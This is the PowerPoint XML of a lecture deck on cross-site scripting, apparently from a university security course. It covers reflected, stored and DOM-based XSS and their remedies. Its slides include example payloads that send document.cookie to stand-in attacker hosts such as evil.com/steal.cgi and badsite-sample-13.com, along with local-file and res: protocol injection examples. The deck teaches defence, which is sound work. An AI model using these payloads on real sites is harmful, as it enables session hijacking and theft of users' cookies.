              <a:t>If failed to verify, dispose of the request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002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Refer to OWASP XXS prevention rules for more stuff.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XSS Attack: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works:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker loads a malicious code on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The malicious code sends to the attacker’s web site resources, such as cookies, owned by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> users of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>website.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200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Although XSS is enabled by vulnerable pages, the victims are the users, not the server itself.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XSS: Basic Picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="\\pc.cpsc.ucalgary.ca\Users\grads\hahmadi\Desktop\get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5" y="1257142"/>
            <a:ext cx="8646625" cy="46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5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XSS: More Detailed Scenario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733800" y="1143000"/>
            <a:ext cx="1260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victim’s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browser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7212013" y="1235075"/>
            <a:ext cx="155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naive.com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H="1">
            <a:off x="4800600" y="1981200"/>
            <a:ext cx="2819400" cy="320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638800" y="1920875"/>
            <a:ext cx="912813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endParaRPr lang="en-US" sz="14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57200" y="1997075"/>
            <a:ext cx="838200" cy="37941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79285" y="1308100"/>
            <a:ext cx="11162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dirty="0"/>
              <a:t>evil.com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191000" y="1997075"/>
            <a:ext cx="609600" cy="37941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620000" y="1936750"/>
            <a:ext cx="838200" cy="37941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/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1295400" y="2454275"/>
            <a:ext cx="2895600" cy="381000"/>
            <a:chOff x="816" y="1824"/>
            <a:chExt cx="1824" cy="240"/>
          </a:xfrm>
        </p:grpSpPr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816" y="1920"/>
              <a:ext cx="182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056" y="1824"/>
              <a:ext cx="1279" cy="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Access some web page</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2911475"/>
            <a:ext cx="2895600" cy="1230313"/>
            <a:chOff x="816" y="2112"/>
            <a:chExt cx="1824" cy="775"/>
          </a:xfrm>
        </p:grpSpPr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82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912" y="2112"/>
              <a:ext cx="1584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000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>&lt;FRAME SRC=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000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>http://naive.com/hello.cgi?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name=&lt;script&gt;win.open(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“http://evil.com/steal.cgi?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cookie=”+document.cookie) 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&lt;/script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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1524000" y="4206875"/>
            <a:ext cx="2438400" cy="68580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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forces victim’s browser to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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hello.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on naive.com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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with this script as “name”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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4800600" y="3063875"/>
            <a:ext cx="2819400" cy="846138"/>
            <a:chOff x="3024" y="2208"/>
            <a:chExt cx="1776" cy="533"/>
          </a:xfrm>
        </p:grpSpPr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3024" y="2304"/>
              <a:ext cx="177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1584" cy="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000000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>GET/ hello.cgi?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>name=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&lt;script&gt;win.open(“http://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evil.com/steal.cgi?cookie”+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>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>document.cookie)&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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7745413" y="3370263"/>
            <a:ext cx="1093787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800" dirty="0" err="1"/>
              <a:t>hello.cgi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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800" dirty="0"/>
              <a:t>executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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4800600" y="4075113"/>
            <a:ext cx="2819400" cy="2036762"/>
            <a:chOff x="3024" y="2845"/>
            <a:chExt cx="1776" cy="1283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1776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3168" y="2845"/>
              <a:ext cx="1584" cy="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&lt;HTML&gt;Hello, dear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&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>win.open</a:t>
              </a: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(“http://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evil.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>steal.cgi?cookie</a:t>
              </a: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=”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+</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a: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)</a:t>
              </a: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&lt;/script&gt;</a:t>
              </a:r>
            </a:p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Welcome!&lt;/HTML&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="AutoShape 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3281" y="3552"/>
              <a:ext cx="1375" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20546"/>
                <a:gd name="adj2" fmla="val -78819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chemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Interpreted as Javascript </a:t>
              </a:r>
            </a:p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chemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>by victim’s browser; </a:t>
              </a:r>
            </a:p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chemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>opens window and calls </a:t>
              </a:r>
            </a:p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solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>steal.cgi on evil.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 26" descr="j02159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256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7" descr="j02159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7075"/>
            <a:ext cx="304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28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="5105400"/>
            <a:ext cx="3429000" cy="473075"/>
            <a:chOff x="432" y="3494"/>
            <a:chExt cx="2160" cy="298"/>
          </a:xfrm>
        </p:grpSpPr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H="1">
              <a:off x="816" y="3494"/>
              <a:ext cx="1776" cy="20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960" y="3504"/>
              <a:ext cx="1584" cy="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GET/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>steal.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="66" name="Picture 31" descr="j02159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520"/>
              <a:ext cx="1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2" descr="j02159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6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AutoShape 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="1616075"/>
            <a:ext cx="1905000" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20750"/>
              <a:gd name="adj2" fmla="val 8614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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E.g., URL embedded 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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in HTML email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="2254250"/>
            <a:ext cx="1143000" cy="533400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hello.cgi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Victim Is Encouraged?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Attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email with a trusted link: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www.trustedlink.com/trusted.cgi?name=&lt;Exploit&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A banner ad link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Putting a link on part of a profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social networks, blogs, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does it work?!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does the user need to click?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No! e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>OnMouseOver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XSS Using Dynamic HTML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91" y="1981200"/>
            <a:ext cx="719299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&lt;a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=http://www.contoso.com/req.asp?name=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&lt;FORM action=http://www.badsite-sample-13.com/data.asp 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     method=post id="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idForm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"&gt;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     &lt;INPUT name="cookie" type="hidden"&gt; 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&lt;/FORM&gt;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&lt;SCRIPT&gt;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idForm.cookie.value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document.cookie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; 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idForm.submit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&lt;/SCRIPT&gt;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Click here!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&lt;/a&gt;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05400" y="3200400"/>
            <a:ext cx="2133600" cy="2362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52424" y="5562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Malicious Input!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4176579" y="1805464"/>
            <a:ext cx="3214418" cy="3106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38776" y="1436132"/>
            <a:ext cx="170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Vulnerable site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066800" y="5120521"/>
            <a:ext cx="4068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How does this attack work?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Against Local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97" y="1143000"/>
            <a:ext cx="75438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Attacker needs to find the location of the HTML inside the computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is more dangerous:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computer zone has higher privileges than network zone.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91" y="2743200"/>
            <a:ext cx="7192995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&lt;html&gt;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&lt;head&gt;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    &lt;title&gt;Local XSS Test&lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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    Hello! &amp;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nbsp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    &lt;script&gt;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location.hash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)&lt;/script&gt;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&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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file://C:\webfiles\localxss.html#&lt;script&gt;alert(''Hi!');&lt;/script&gt;</a:t>
            </a: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4267202" y="3961431"/>
            <a:ext cx="2819398" cy="165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86600" y="3776765"/>
            <a:ext cx="21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Vulnerable HTML!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>
            <a:off x="3810001" y="5562600"/>
            <a:ext cx="2819398" cy="165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29399" y="537793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doni" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Malicious URL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XSS Against HTML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Internet Explorer supports the “res:” protocol to extract HTML resources from binary files such as DLL, EXE, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., res://mydll.dll/#23/ERROR will extract the HTML (#23) resource named ERROR from mydll.dll and display it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If ERROR takes input from a URL, it leads to XSS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dirty="0"/>
              <a:t>Treat HTML resource data like a local HTML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11911</TotalTime>
  <Words>2063</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>274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MS PGothic</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Baskerville Old Face</vt:lpstr>
      <vt:lpstr>Bodoni</vt:lpstr>
      <vt:lpstr>Bodoni MT</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>NewsPrint</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS Attack: Description</vt:lpstr>
      <vt:lpstr>XSS: Basic Picture</vt:lpstr>
      <vt:lpstr>XSS: More Detailed Scenario</vt:lpstr>
      <vt:lpstr>How Victim Is Encouraged?</vt:lpstr>
      <vt:lpstr>XSS Using Dynamic HTML Script</vt:lpstr>
      <vt:lpstr>XSS Against Local HTML File</vt:lpstr>
      <vt:lpstr>XSS Against HTML Resources</vt:lpstr>
      <vt:lpstr>Some Notes about XSS?</vt:lpstr>
      <vt:lpstr>XSS in Orkut</vt:lpstr>
      <vt:lpstr>XSS Attack Types</vt:lpstr>
      <vt:lpstr>Non-persistent (Reflective) XSS</vt:lpstr>
      <vt:lpstr>Persistent (Stored) XSS</vt:lpstr>
      <vt:lpstr>DOM-based XSS</vt:lpstr>
      <vt:lpstr>Not-to-Do’s in Web</vt:lpstr>
      <vt:lpstr>Other Not-to-Do’s in Web</vt:lpstr>
      <vt:lpstr>Protecting Against XSS</vt:lpstr>
      <vt:lpstr>How NOT to Provide Security</vt:lpstr>
      <vt:lpstr>XSS Remedies</vt:lpstr>
      <vt:lpstr>XSS Remedies</vt:lpstr>
      <vt:lpstr>XSS Remedies</vt:lpstr>
      <vt:lpstr>XSS Remedies</vt:lpstr>
      <vt:lpstr>Review Code for XSS Bugs</vt:lpstr>
      <vt:lpstr>Review Code for XSS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1464</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-16T00:21:23Z</dcterms:modified>
</cp:coreProperties>
</file>